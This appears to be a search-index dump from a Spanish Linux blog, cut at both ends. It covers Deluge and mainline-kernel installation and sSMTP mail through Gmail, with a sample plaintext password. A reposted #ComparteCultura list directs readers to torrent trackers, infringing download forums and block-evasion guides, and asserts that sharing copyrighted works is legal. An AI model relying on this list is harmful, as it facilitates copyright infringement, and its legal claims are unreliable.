/var/log/deluge/web/warning.log\u0026#34; Y reiniciamos el servicio:\n$ sudo invoke-rc.d deluge-daemon restart Para rotar los ficheros de log:\nsudo cat \u0026gt; /etc/logrotate.d/deluge \u0026lt;\u0026lt; EOF /var/log/deluge/_/_.log { weekly missingok rotate 7 compress notifempty copytruncate create 600 } EOF Referencias » How to install Deluge (v1.2.x/v1.3.x) headless on Ubuntu Server » Ubuntu Init Script » Bandwith Tweaking » Deluge FAQ\n","permalink":"http://karpoke.ignaciocano.com/2012/02/09/instalar-deluge-en-ubuntu-lucid-lynx/","summary":"\u003cp\u003e\u003ccode\u003edeluge\u003c/code\u003e es un cliente de BitTorrent en el que la interfaz está separada\ndel núcleo, que corre como un servicio, lo que posibilita usarlo de\nforma remota a través de una interfaz web.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePodemos instalar \u003ccode\u003edeluge\u003c/code\u003e y su interfaz web desde los repositorios:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install deluged deluge-webui\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCrearemos el usuario \u0026ldquo;deluge\u0026rdquo; para ejecutar este servicio:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo adduser --disabled-password --system --home /var/lib/deluge --gecos \u0026#34;SamRo Deluge server\u0026#34; --group deluge\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCreamos el \u003cem\u003escript\u003c/em\u003e \u003ccode\u003e/etc/default/deluge-daemon\u003c/code\u003e:\u003c/p\u003e","title":"Instalar deluge en Ubuntu Lucid Lynx"},{"content":"Esta receta muestra como instalar un nuevo kernel precompilado en Ubuntu.\nAntes de continuar, cabe avisar de que si tenemos módulos del kernel que no sean libres, por ejemplo, módulos de ATI, Broadcom o Virtualbox, es posible que nos surja algún problema que deberemos resolver en cada caso. En algunos casos, volver a reinstalar las aplicaciones o los controladores puede funcionar.\nInstalamos module-init-tools, una herramienta para gestionar módulos del kernel que se encuentra en los repositorios, que puede evitar que nos aparezcan algunos errores y avisos.\nEl kernel lo podemos descargar de kernel.ubuntu.com. En este caso vamos a descargar la versión 3.2.1 Precise PAE de 32 bits, así que descargamos los paquetes.\nlinux-headers-all linux-headers-generic-pae_i386 linux-image-generic-pae_i386 $ mkdir ~/Downloads/kernel-v3.2.1-precise $ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201_3.2.1-030201.201201121644_all.deb $ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb $ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-image-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb Los instalamos en ese mismo orden:\n$ sudo dpkg -i linux-headers-3.2.1-030201_3.2.1-030201.201201121644_all.deb $ sudo dpkg -i linux-headers-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb $ sudo dpkg -i linux-image-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb Sólo queda reiniciar para poder probar el nuevo kernel.\nActualizado el 13 de marzo de 2012 He subido un pequeño script que permite automatizar este proceso. Comprueba la versión del kernel que tenemos instalada y si hay una nueva versión, la descarga y, si así lo queremos, la instala.\nUn ejemplo:\n$ install-new-kernel.sh [+] Checking \u0026#39;http://kernel.ubuntu.com/~kernel-ppa/mainline/\u0026#39; for a new version... [+] New version 3.2.11 available. [+] Checking \u0026#39;http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.11-precise/\u0026#39; for packages... [+] Downloading \u0026#39;linux-headers-3.2.11-030211_3.2.11-030211.201203131335_all.deb\u0026#39;... [+] Downloading \u0026#39;linux-headers-3.2.11-030211-generic-pae_3.2.11-030211.201203131335_i386.deb\u0026#39;... [+] Downloading \u0026#39;linux-image-3.2.11-030211-generic-pae_3.2.11-030211.201203131335_i386.deb\u0026#39;... [+] Do you want to install them now? (y/n) y ","permalink":"http://karpoke.ignaciocano.com/2012/01/26/instalacion-de-un-nuevo-kernel-ppa-en-ubuntu/","summary":"\u003cp\u003eEsta receta muestra como \u003ca href=\"http://www.howopensource.com/2011/08/how-to-install-linux-kernel-3-1-rc2-oneiric-in-ubuntu-11-04-10-10-and-10-04/\"\u003einstalar un nuevo kernel precompilado\u003c/a\u003e en\nUbuntu.\u003c/p\u003e\n\u003cp\u003eAntes de continuar, cabe avisar de que si tenemos módulos del kernel que\nno sean libres, por ejemplo, módulos de ATI, \u003ca href=\"http://www.ultimateeditionoz.com/forum/viewtopic.php?t=2504\"\u003eBroadcom\u003c/a\u003e o\n\u003ca href=\"http://unix.stackexchange.com/questions/10962/i-am-failing-to-build-virtualbox-driver-for-linux-2-6-38\"\u003eVirtualbox\u003c/a\u003e, es posible que nos surja algún problema que deberemos\nresolver en cada caso. En algunos casos, volver a reinstalar las\naplicaciones o los controladores puede funcionar.\u003c/p\u003e\n\u003cp\u003eInstalamos \u003ccode\u003emodule-init-tools\u003c/code\u003e, una herramienta para gestionar módulos\ndel kernel que se encuentra en los repositorios, que puede evitar que\nnos aparezcan algunos errores y avisos.\u003c/p\u003e","title":"Instalación de un nuevo kernel PPA en Ubuntu"},{"content":"Con esta receta, podremos enviar correos electrónicos desde el terminal sin necesidad de tener instalado un servidor de correo, simplemente utilizando una cuenta de GMail y sSMTP, que se encuentra en los repositorios. Esta opción puede estar bien para enviar correos desde un sistema que utilizamos sólo nosotros, pero no es un sustituto de un servidor de correo como Sendmail, Exim o Postfix.\nPara configurarlo, editamos el fichero /etc/ssmtp/ssmtp.conf y añadimos las siguientes líneas al final del mismo:\nAuthUser=johndoe@gmail.com AuthPass=SGsA97wdhA92Dd FromLineOverride=YES mailhub=smtp.gmail.com:587 UseSTARTTLS=YES UseTLS=YES Hay que tener en cuenta que nuestra contraseña está escrita en texto plano, y que cualquier persona con privilegios de administrador, o que esté usando nuestra cuenta, tendría acceso a ella.\nLo siguiente será parar sendmail, deshabilitarlo y sustituirlo por ssmtp:\n$ sudo service sendmail stop $ sudo chkconfig sendmail off $ sudo mv /usr/sbin/sendmail{,.bak} $ sudo ln -s /usr/sbin/ssmtp /usr/sbin/sendmail Si quisiéramos recuperar sendmail, deberemos realizar los pasos en orden inverso:\n$ sudo mv /usr/bin/sendmail{.bak,} $ sudo chkconfig sendmail on $ sudo service sendmail start Para probarlo, basta ejecutar:\n$ echo \u0026#34;Lorem ipsum\u0026#34; | mail -s \u0026#34;Lorem\u0026#34; johndoe@gmail.com Si nos sale que no reconoce el comando mail, podemos instalar el paquete bsd-mailx.\nSi tenemos alguna aplicación que nos envía un correo local, a un usuario del sistema, éste no será accesible y la cuenta de GMail desde la que enviamos el correo recibirá un notificación de envío fallido.\nGMail incluye en los mensajes las siguiente cabeceras:\nReceived: by 10.216.138.89 with SMTP id z67mr1808982wei.10.1328051201592; Tue, 31 Jan 2012 15:06:41 -0800 (PST) Return-Path: Received: from myhostname (21.48.29.25.dynamic.ip.es. [25.29.48.21]) by mx.google.com with ESMTPS id n5sm67537993wiw.7.2012.01.31.15.06.38 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 31 Jan 2012 15:06:40 -0800 (PST) Message-ID: \u0026lt;4f287400.e54cb40a.54de.ffff801c@mx.google.com\u0026gt; Received: by myhostname (sSMTP sendmail emulation); Wed, 01 Feb 2012 00:06:36 +0100 Podemos ver que en las cabeceras Received se incluye el nombre de nuestro equipo, la IP que teníamos y el nombre del MTA que hemos utilizado, sSMTP, por lo que el receptor tiene información acerca de quién envió el correo.\nReferencias » How To Use Gmail Account To Relay Email From a Shell Prompt | Via L\u0026rsquo;home dibuixat\n","permalink":"http://karpoke.ignaciocano.com/2012/01/14/configurar-ssmtp-para-enviar-correo-mediante-gmail-desde-el-terminal/","summary":"\u003cp\u003eCon esta receta, podremos enviar correos electrónicos desde el terminal\nsin necesidad de tener instalado un servidor de correo, simplemente\nutilizando una cuenta de GMail y  sSMTP, que se encuentra en los\nrepositorios. Esta opción puede estar bien para enviar correos desde un\nsistema que utilizamos sólo nosotros, pero no es un sustituto de un\nservidor de correo como Sendmail, Exim o Postfix.\u003c/p\u003e\n\u003cp\u003ePara configurarlo, editamos el fichero \u003ccode\u003e/etc/ssmtp/ssmtp.conf\u003c/code\u003e y\nañadimos las siguientes líneas al final del mismo:\u003c/p\u003e","title":"Configurar sSMTP para enviar correo mediante GMail desde el terminal"},{"content":"La recopilación de la lista original de #ComparteCultura es obra de @kurioso y está en #ComparteCultura.\nEn 1980 la industria discográfica británica realizó una campaña antipiratería con el slogan \u0026ldquo;Home Taping Is Killing Music\u0026rdquo;. 30 años más tarde la música está más viva que nunca y lo que está muriendo es la industria, que reclama el \u0026rsquo;lucro cesante\u0026rsquo; de un negocio de intermediación descaradamente obsoleto. Hay que meterse en la cabeza: Compartir no es delito. Descargar no es delito. Copiar no es robar. La industria quiere meterte miedo. ¿Cómo podemos ejercer nuestros derechos? Comparte, descarga y copia la siguiente lista de recursos culturales.\nComparte en Twitter. Pega en Facebook. Envíala por email. Complétala en tu blog. Llévate la lista. PDF, DOC, HTML\nEsta lista es una respuesta natural al recorte de derechos de la nueva ley SINDE (Así va a funcionar) , futura SOPA y similares y a la falta de ofertas justas de contenidos culturales accesibles; a una necesaria purga de intermediarios, comisionistas y parásitos del negocio anticuado que no han sabido adaptarse a las nuevas tecnologías para mantener su nicho, y que impiden un consumo responsable sin sentirse estafado y una justa contraprestación al que verdaderamente se lo merece; el autor de las obras.\nJuro q no descargo música desde que existe Spotify, es absolutamente innecesario. Juro q no pago por ver series, es absolutamente imposible\n” Kurioso (@kurioso) January 04, 2012\nEl \u0026rsquo;todo gratis\u0026rsquo; sigue siendo la falacia de los que quieren controlar la industria y criminalizar siempre a los consumidores. El acceso libre y responsable a contenidos gratuitos es solo el camino espontáneo para promocionar los mismos y, más tarde, poder premiar responsablemente a sus autores comprando, regalando o recomendando sus trabajos. Durante años se ha estado pagando siempre a ciegas. Ahora hay mecanismos legítimos para hacerlo de una manera más natural y coherente. Nadie en su sano juicio puede defender la sostenibilidad de la cultura con gratuidad de los contenidos, pero el derecho del autor a vivir de su obra es tan importante como el acceso universal a la misma.\nSi enlazar a paginas que enlazan a contenidos con derechos de autor es delito. Enlazar a Google es delito #ComparteCultura\n” Kurioso (@kurioso) January 09, 2012\nAparte de Spotify, Grooveshark, RTVE y otras ofertas con contenido gratuito que compensan de alguna forma a los autores, el criterio para completar esta lista colaborativa ha sido poner en común, entre muchos usuarios de la red, las herramientas y webs necesarias para poder ejercer el derecho a compartir libremente__sin más ánimo de lucro__ que el imprescindible para el mantenimiento de los sistemas necesarios que lo hagan posible; y que estén servidas por proveedores de alojamiento fuera de España donde no puedan cerrar mediante la legislación española. Todo ello para demostrar, entre otras cosas, que es quimérico y prácticamente imposible el control de Internet sin censurar y lesionar derechos fundamentales; generando también mayor interés por la cultura y potenciando, en consecuencia, el consumo y la distribución posterior de más bienes culturales.\nEntrada reservada para ver a Les Luthiers. Será la cuarta vez que lo hago en vivo. ¿Que cómo los conocí? Con una copia que mató la cultura.\n” David Bravo (@dbravo) January 05, 2012\nLista de contenidos culturales gratuitos accesible desde la red P2P La mejor forma de ejercer tu derecho a compartir con otros usuarios de la red es el P2P (Peer-to-Peer). El P2P sirve para intercambiar información de forma directa, sin intermediarios ni webs, entre dos o más usuarios de la red. De la misma forma que hace 30 años dejabas una casete \u0026lsquo;rulase\u0026rsquo; entre los compañero de colegio, hoy se han optimizado las herramientas para ejercer exactamente el mismo derecho. Es una actividad legítima, no punible y que debe escapar del control de cualquier gobierno para que se garantice la neutralidad de Internet. Hasta desde el Ministerio de Cultura español, la SGAE, Moncloa, y desde el Senado lo han utilizado para bajar contenidos \u0026lsquo;protegidos\u0026rsquo; con derechos de autor. ** **\nNo quiero que sea gratis. Quiero que sea justo. #ComparteCultura\n” (@esaotra) January 09, 2012 Mediante un programa, o cliente, el usuario puede compartir su material cultural con otros usuarios dividiendo en paquetes esa información y alojándola en varios trackers (servidores anónimos) para que mediante un torrent (pequeño archivo con la dirección de esos paquetes) puedan descargárselos otros usuarios. De tal forma que para encontrar cualquier contenido cultural solo hace falta buscar estos pequeños archivos o, en adelante, \u0026rsquo;torrents\u0026rsquo;.\nAlgunos de los clientes torrents más conocidos son: Transmissionbt, Vuze, Utorrent, Bitcomet, Delunge, aMule, Bittorrent, Ares, Bitspirit, Faroo,¦\nTambién útiles los gestores de descargas directas como: Jdownloader, Flashget, Rapget, Internet download manager, Download Acelerator, Tucan o Cryptload.\nAlgunos de los mejores buscadores de torrents:\n**Mininova.org, Elitetorrent, Torrents, [Torrentportal][], [Torrentmatrix][], [Isohunt.][]** Thepiratebay.org. Si no lo encuentras aquí, es muy probable que no exista. Torrentbutler. Un buscador solo de torrents para películas en HD. Entorno visual muy cuidado » Torrent-finder. Buscador de buscadores. Gestiona tu consulta\nentre más de 150 buscadores. Torrentz. Otro meta-buscador sencillo y práctico Música Google. Sí, el gran buscador también es un \u0026lsquo;recopilador voluntario y con ánimo de lucro de enlaces directos a descargas musicales\u0026#39;. Solo hay que tener cierta pericia a la hora de [buscar enlaces a MP3][], por ejemplo. Aquí te [enseñan varios trucos para buscar por tipo de archivo][]. ¿Cerrará la Ley Sinde también el gigante google? Spotify. Un clásico. Referente para el nuevo modelo de negocio en la industria musical. Una forma de disfrutar de la música gratuitamente con beneficio directo para el autor. También opción de pago muy recomendable para llevarlo en tu dispositivo móvil. Desde que uso esta oferta \u0026#39;racional\u0026#39; no he vuelto a descargar música. __Last.fm**. El padre de Spotify sigue dando guerra. Música gratuita con una estupenda red social de recomendaciones. Goear. Opción nacional. Un poco denostada, pero con un gran catálogo musical. Puedes escuchar desde [los últimos éxitos internacionales][] a [bandas noveles sin intermediación][] carroñera. Dispone de aplicaciones para el [iPad, iPhone][] y [Android][] Rhapsody. Un servicio de streaming musical tipo \u0026lsquo;Spotify\u0026rsquo; pero limitado a territorio norteamericano. Con [un pequeño truco][] podéis disfrutarlo utilizando una IP americana. Deezer. Una de las pioneras en ofrecer música en streaming de manera gratuita. Comenzó a funcionar en 2006 bajo el nombre de BlogMusik. Dice ofrecer un catálogo de 10 millones de pistas. Para disfrutar de su música en [Android][3] o [iPad][]/[iPhone][] hay que pagar la suscripción [premium][], como en _Spotify_ Grooveshark. 30 millones de usuarios avalan esta red social que permite buscar y subir música de forma libre y gratuita y sirve también de promoción a artistas noveles. [Aquí algunos trucos][] para descargar la música a tu disco duro y hacer la red más \u0026#39;social\u0026#39;. Noisetrade. Una web con miles de discos, completamente gratis y legales, para promocionar a artistas noveles y no tan novatos. Las producciones son buenas y la plataforma está exquisitamente diseñada. Bucear en ella para dejarse llevar solo por la música sin prostituciones comerciales es un deporte imposible de practicar hace años. ¡Practícalo! Gratismusica Foro en el que sus usuarios envían enlaced de megaupload y rapidshare sobre todo tipo de música. Songr es una aplicación (windows) que utiliza 16 buscadores para localizar, reproducir y descargar archivos mp3 y otras fuentes de música como youtube. Jamendo Un clásico. 300.000 temas de música libre, legal e ilimitada de autores dispuestos a compartir su trabajo bajo licencia [Creative Commons][] y dejando fuera al aparato distribuidor. Series, películas y documentales Google. Sí. Volvemos a la página más \u0026lsquo;pirata\u0026rsquo;, \u0026lsquo;criminal\u0026rsquo; e \u0026#39;ilegal\u0026#39; de todas. La empresa de tecnología web que más factura del mundo. Entre otras cosas indexando automáticamente enlaces a archivos con derechos de autor y alojados en webs de terceros. Justo lo que persigue la _Ley Sinde_. ¿No quieres usar ninguna otra web que haga lo mismo? Tranquilo, no es necesario. Busquemos, por ejemplo, todos los torrents a la cuarta temporada completa de la serie \u0026#34;The Big Bang Theory\u0026#34;. [Primero en versión original][], o si preferimos [en castellano][]. ¡Ojo a la caja de búsquedas! Puedes sustituir \u0026#34;megavideo.com\u0026#34; por algún otro servicio de alojamiento de archivos que indexe directamente en google; como \u0026#34;[downupload.com][]\u0026#34;, \u0026#34;[uploaded.to][]\u0026#34; o \u0026#34;[Bitshare.com][]\u0026#34;, Si no puedes buscar directamente [en un buscador que indexe][] megaupload y rapidshare. Series.ly. Herramienta social para compartir todo lo referente a series y películas. Agenda, enlaces a descarga directa y _streaming_, reproductor propio. Necesita invitación. Epoilertv. Una de las mejores bases de datos en español sobre series de televisión sin ánimo de lucro. Con agenda para recordar y marcar las ya vistas y, lo que es más importante, enlaces a las descargas directas o streaming de nuestros capítulos preferidos. Serieonline Enlaces a Series, películas y una buena sección de documentales. No tiene publicidad [ni ánimo de lucro][]. Archive.org 60.000 películas de dominio público. Documentales, conciertos, documentos históricos, dibujos animados¦ En inglés. Teledocumentales. Documentales en castellano de frecuente actualización y muy bien clasificados. Visión online. Para perder horas y horas. Documentary24 Una de las mejores recopilaciones particulares de documentales gratis en la red. En inglés Youtube Movies Películas gratis y \u0026rsquo;legales\u0026rsquo;. La colección es deprimente pero alguna [puede valer millones][] cuando las leyes no nos dejen alternativas para ver el resto. Ted Talks. Imprescindible. La mejor forma de divulgación de tecnología, entretenimiento y diseño en forma de charlas gratuitas al alcance de todos. Varios idiomas. Subtítulos. Docuciencia. Recopilación de todo tipo de documentales de ciencia y tecnología. A un solo clic. Eso es divulgar. Foofind.com Buscador de archivos de descarga creado por el desarrollador español [Pablo Soto][]. No [sin obstáculos][]. Incluye redes P2P. Una forma más cómoda, sin pasar por terceros, de acceder a tus contenidos audiovisuales favoritos. Adnstream. Más de 300 películas de cine de acción, Clásico V.O, Bélico, western y GRATIS. Hdcity. Uno de los tracker privados, sin ánimo de lucro ni publicidad, más usados en España. Necesita invitación y cierto compromiso para compartir, no solo descargar. Hace poco [cambiaron su dominio para hacer frente a la Ley Sinde][]. Enlaces a películas en HD. Eztv.it. Una joya. Foro con información actualizadísima de series. Sin duda una de las mayores comunidades mundiales para compartir audiovisuales de BitTorrent. En inglés. Necesita registro. No para ver los torrents. Liberateca Series. No tiene una gran oferta, pero lo que hay está muy bien organizado y accesible. Divxclasico. ¿Cansado de buscar películas que tengan más de 10 años? Para los amantes del cine clásico. Un foro imprescincible, con enlaces a _torrents_ e intercambio de información sobre el cine más olvidado. Imprescindible para comprender y mantener vivo los orígenes del séptimo arte. Elitefreak. Torrents a 4.500 películas, más de 1.000 series y 130 documentales; foro, clasificaciones, favoritos. Una de las webs más usadas para compartir y disfrutar de archivos con contenido audiovisual en España. __Descargardocumentales.*__National Geographic, Discovery Channel, Canal Historia, Odisea*¦ enlaces a descarga de las mejores series de documentales. Estupenda. Youtorrent. Buscador torrent combinado con una base de datos de series y películas. Muy bueno. En inglés. Pelis24. Colección de enlaces a películas dobladas, en versión original y subtituladas. _Forosdz.** Foro de_Anime, Manga, Hentai, Yaoi, Cosplay¦(a partir del 3 me pierdo). Para auténticos frikis MejorenVO. Ideal para practicar idiomas. Todas [las series][] y películas en versión original con subtítulos. [Con manual básico para configuración de los mismos][]. Solo-free. Foro de películas bastante ordenado y [clasificado][]. La sección de series es meramente testimonial¦ Ev0.in. Un estupendo recopilador de enlaces de series en versión original y a varias resoluciones. Solo eso, nada más. Ni un solo anuncio. Tusseries.com. Otro foro español, sin ánimo de lucro, con una gran colección de enlaces. Destaca su base de datos de serie españolas. Necesita registro. Televisión Online. Alacarta. de RTVE, una oferta \u0026rsquo;legal\u0026rsquo; y ejemplo de como una televisión pública se puede adaptar sin problemas a los nuevos medios. [Series de producción propia][], [documentales][], [música][]¦ En su contra: no se pueden descargar y solo son visibles a través de su web __Tutelevisiononline**. Recopilación de enlaces a streaming de televisiones de más de 100 países. Medinalia. 1.600 canales de televisión y 5200 estaciones de radio en vivo. Viewmy.tv. Una plataforma de vídeo online independiente que sirve señal de 120 países. Buscador muy completo. Teledirecto. Recopila la señal de las cadenas que la sirvan en su web, enlazando directamente a ellas. Muy útil. Libros, periódicos y cómics. Google, de nuevo, pone a tu disposición y con una sencilla búsqueda por tipo de archivo (filetype:epub) [miles de ebooks en castellano][]. Sin restricciones, sin censuras, para todos¦.¡¡¡CIERREN GOOGLE, POR FAVOR, ESTA MATANDO LA CULTURA!!! Si quieres hacer una búsqueda más específica con criterios no facilitados directamente por el buscador, puedes usar [\u0026#39;Google Hacks\u0026#39;][]. Bing. El buscador de Microsoft, también pone a tu disposición otros [7.000 enlaces a ebooks][] Calibre. Un programa gratuito e imprescindible para gestionar y [cambiar el formato digital][] de los ebooks y poder cargarlos en tu lector de libros electrónicos. Imprescindible para hacer más práctico el _Kindle_ y no depender sólo de la tienda de Amazon. Librosparakindle. Como su nombre indica, pequeño blog con enlaces a 300 libros ya convertidos a mobi, el formato de Kindle. Colecciones casi completas de *Agatha Christie, Arthur C. Clarke, Brian W. Aldiss, Carl Sagan, Reverte*¦ Manual de desobediencia a la Ley Sinde. \u0026ldquo;Aprende a cambiar tus DNS, a configurar un proxy, a configurar y utilizar Tor para navegar anónimamente, a entender para qué sirve una red privada virtual (VPN), \u0026#34;¦ todo lo necesario para ejerder tus derechos de copia privada y una Ley tan inútil como injusta. Desarrollado por [Hacktivistas][] y editado por \u0026#39;[Traficantes de Sueños][]\u0026#39; y el periódico [Diagonal][]. Librosenepub 3.000 enlaces a libros de todo tipo en formato epub. Incómodo de buscar pero buena compilación. Open Library. Un buscador, [iniciativa de Internet Archive][], que indexa desde las grandes bases de datos de internet para acumular 1.000.000 de libros gratis. Sí ¡un millón! La mayoría en inglés pero también [tienes 11.000 en Español][]. Ofrece [un potente buscador][] para texto incluido en las obras. Ideal para investigar fuentes y amantes de la literatura clásica Gutenberg. 36.000 ebooks (muchos en español) en libre descarga. Formatos soportados; [Kindle, Android, iPad][]¦ Los [más descargados][] Epubgratis.me. Más de 2000 ebooks recientes en formato ePub. Muy buena _interface_. Sin publicidad. Una joya altruista. 24symbols. Proyecto enteramente español. El \u0026ldquo;Spotify de los libros\u0026#34;. Ofrece un catálogo contemporáneo de obras gratuitas, financiándose con publicidad y cuentas premium. Muy buena idea aunque los libros deberás leerlos directamente \u0026#39;online\u0026#39; en la web o en la [aplicación para iPad][]. Para descargártelos o leer \u0026#39;offline\u0026#39; necesitas la cuenta premium.(9‚¬ mes) Bookcamping. Un catálogo-biblioteca abierto y colaborativo con temática social y surgida a raíz del movimiento 15M. Sólo son descargables los que tienen una marca blanca en la ficha. » 1libro1euro. 30 libros gratis de autores contemporáneos a\ncambio de una donación voluntaria por una buena causa. Youkioske.com. Quizás la mayor comunidad para compartir prensa y publicaciones. Le sobra publicidad. Imperdible. __Issuu, ScribdyCalaméo.__Tres formas de publicar y leer todo tipo de revistas, libros y documentos. Pordescargadirecta. Foro de Prensa diaria, revistas y magazines. Sin publicidad Quioscovagos. Foro con enlaces a toda la prensa y revistas que se edita en España Premiomag. 1.300 enlaces a revistas de 5 paises. Desde el [National Geographic][] al [New Yorker][]. No hay editadas en España. Libroteca.net. 10.000 libros, la mayoría en español, libres de derechos de autor. Bibliotheka.org. 140 millones de páginas vistas. Biblioteca general sin ánimo de lucro. Más de 60.000 títulos en Pdf y en castellano; clasificados por [temáticas][] y [autores][]. La web es rancia, el contenido, una joya. Quedelibros.com. Una comunidad donde los usuarios colaboran compartiendo la información que han encontrado en Internet. Clasificación de los autores y obras más leídas. __Papyrefb2**. Más de 2500 libros en formato papyre. Buena clasificación. Sin publicidad. Liberateca books. Oferta limitada pero con una \u0026lsquo;interface\u0026rsquo; muy intuitiva, moderna y clara. Sin publicidad. Elaleph.com. Nace con la necesidad de conseguir textos en español en Internet para investigación. Cuenta con una biblioteca digital de más de 2.000 títulos. Colecciones digitales de las Bibliotecaas Nacionales. [Manuscritos][] digitalizados, cientos de [incunables][], [fondos][] culturales, [catálogos][] publicados, [lenguas][] territoriales¦ todo lo necesario para cualquier filólogo o ratón de biblioteca clásica y de dominio público¦ Biblioteca digital hispánica¦ Millones de documentos digitalizados por la Biblioteca Nacional para agilizar las búsquedas y facilitar la difusión de cultura de dominio público. [Literatura][], [Música impresa][], [documentos sonoros][], [material cartográfico][]¦ Librodot.com. 11.000 obras libres de derechos de autores clásicos, poco conocidos o inéditos. Manuales científicos y tesis doctorales. Manybooks. Libros de dominio público en 40 idiomas. [También en español.][] Feedbooks.com. Gran colección en inglés de obras contemporáneas de dominio público. Lamansion. Comunidad de cómics editados en español. Marvel, DC, Chaos, clásicos¦ Liquidcomics. es una editorial internacional de cómics gratuitos que se pueden leer online. Patrocinada por Sir *[Richard Branson][]_ ofrece obras del director*John Woo, Guy Ritchie_ o del mismísimo _Wes Craven_. Marvel. La gigantesca editorial de cómics americana puso en su día a disposición de todo el mundo, 250 cómics gratuitos para promocionar su tienda online, _[Digital Comics Unlimited][]_. Claro que la mejor manera de promoción es tener acceso a la colección completa de cómics de la editorial. Desde el año 1960 hasta el 2010. Para luego elegir cuáles comprar. [Puedes descargarte aquí los enlaces torrents.][] Novaro. Un pequeño blog donde poder encontrar enlaces de descarga a cómics antiguos de la editorial Novaro 1949-1984 (Fantomas, Batman, Archie, La pequeña Lulú, etc.) Libroscompartidos.com. Curiosa iniciativa para intercambiar con otros lectores aquellos libros en papel que ya has leído y solo hacen \u0026#39;biblioteca\u0026#39;. Muy interesante. Librosmaravillosos.com. Un descubrimiento personal. Una pareja de autores decidió un día recopilar, en formato digital, todos aquellos libros que habían supuesto un gran impacto durante su aprendizaje y formación. Una colección estupenda de libros científicos y de curiosidades, para todas las edades, elegidos por el azar que supone cada proceso personal de adiestramiento. Genial. Orsai. Quizás el mejor proyecto para explicar el cambio del modelo industrial que urge con la llegada de la tecnología digital. Paradójicamente es una revista en papel, sin publicidad, sin intermediarios, que paga justamente a sus colaboradores y que al final se regala en soporte digital. Funciona y muy bien. El admirado _Hernán Casciari_ lo explica estupendamente [en esta TED][] Ciencia y Cultura. Freefullpdf. Buscador en PDF de más de 80 millones de artículos científicos de Medicina, Biología, Física, Patentes. Imprescindible para investigadores Base de datos de la Unesco. Todas las publicaciones editadas por la organización desde 1945. Educación, ciencias naturales, ciencias sociales y humanas, cultura¦ Con un [buscador fabuloso][Base de datos de la Unesco] Pubmed. Buscador que indexa más de 21 millones de estudios de literatura médica extraídas de la red _Medline_. Algunas referencias a estudios completos y descargables, otras te llevan a su publicación original. Scielo. Biblioteca virtual formada por una colección de revistas científicas españolas de ciencias de la salud. Eoi. La Escuela de Organización industrial pone a disposición, con licencia_creative commons_, cientos de libros, informes, conferencias seminarios y monografías sobre economía e innovación empresarial. » Scirus. Buscador de documentos científicos con más de 440\nmillones de entradas. En inglés. Google Scholar. Buscador para artículos de revistas científicas, enfocado en el mundo académico, y soportado por una gran base de datos de dominio público. Almacenamiento virtual. Wuala. Disco duro virtual para compartir tus archivos con quien quieras. 2gb de espacio gratuito Dropbox. El servicio más conocido de alojamiento de archivos multiplataforma en la nube. 2gb. Un tutorial [para hacer tus copias de seguridad][] SoulSeek. El clásico disco duro abierto a la comunidad. Un poco en desuso. Pero para música es muy práctico. Minus. Para compartir en comunidad vídeos online. Límite de hasta 10gb Esnips. Ofrece hasta 5GB de almacenamiento en la nube\nAdrive. 50Gb de almacenamiento gratuito. Sí ¡¡¡50!!! La\nmayor oferta de la red. Pequeños proyectos. De todo un poco. Joyas de la red. Gilipolladas del kigonjiro. Música de conciertos, actuaciones en directo que no podrás encontrar en las tiendas. Ninguno de los DVD o CD de la página han sido publicados oficialmente, sino que han sido cedidos por los artistas. Hay pequeños tesoros, como este concierto de [Siniestro Total y Loquillo][]¦ Qomun. es un directorio y plataforma de promoción de cultura libre, construido con la colaboración de sus lectores. Música, vídeo, software, literatura, imagen¦ Horrortheque. Películas de terror de dominio público. Impresionante colección. En inglés. Sideravisus. Una de las joyas de esta lista. Biblioteca personal y virtual enfocada principalmente a autores de ciencia ficción. Tiene grandes (y actuales) clásicos como [1984][] e importantes e imprescindibles [series de culto, como las de Asimov][]. Choralwiki. Para compartir partituras de música coral. Muy curioso. Amateurshotel. \u0026ldquo;gente apasionada por la fotografía, la ilustración, el diseño, los relatos cortos, microrelatos o poemas ¦ que llena sus ratos libres (y no tan libres) escribiendo, pintando, fotografiando¦y compartiendo sus obras\u0026#34; Librodenotas. Pequeña pero cuidadísima editorial que publica ebooks gratuitos seleccionados con su sabio criterio para ofrecer calidad antes que cantidad. Piden una donación de 1‚¬ por obra. Webcomics. Pequeña comunidad, sin ánimo de lucro, que se dedica a promocionar los webcómics escritos en castellano. De momento tienen una base de dato de casi mil webs. Un placer navegar por [algunas joyas][]. Mjlopezz. [34 libros, guías y manuales gratuitos sobre marketing y social media][Mjlopezz] P2pu.org. Muy interesante. La universidad \u0026lsquo;Peer to Peer\u0026rsquo;. Comunidad que utiliza el soporte P2P para crear proyectos educativos de aprendizaje colaborativo. Tienes cursos desde \u0026#39;[programación básica en HTML5][]\u0026#39; a \u0026#39;[dibujo a lápiz][]\u0026#39; Ebooksgratis. Blog que se dedica a recopilar libros gratis y libres para aunar intereses entre lectores que buscan ebooks y escritores y/o editoriales que desean que sus ebooks sean encontrados. Encomiable. Artesuniversales. Pequeño blog con enlaces y reseñas de grandes [\u0026#39;Best Sellers\u0026#39;][] y novelas [clásicas][] y [contemporaneas][]. En formato ebook. Esta lista no hubiera sido posible sin la ayuda de decenas de personas que han compartido sus vicios y costumbres culturales en Twitter. Es básico que juntos luchemos contra una ley española injusta, utópica, que solo busca censurar y generar sentimiento de miedo y culpa; y que no defiende los derechos de todos por igual. Se trata de construir libremente y con las herramientas que nos ha tocado disfrutar, una comunidad capaz de compartir bienes culturales sin ánimo de lucro.\nRecuerda:\n\u0026ldquo;No hay autores poco consumidos por culpa de la piratería. Hay malos autores buscando excusas para no 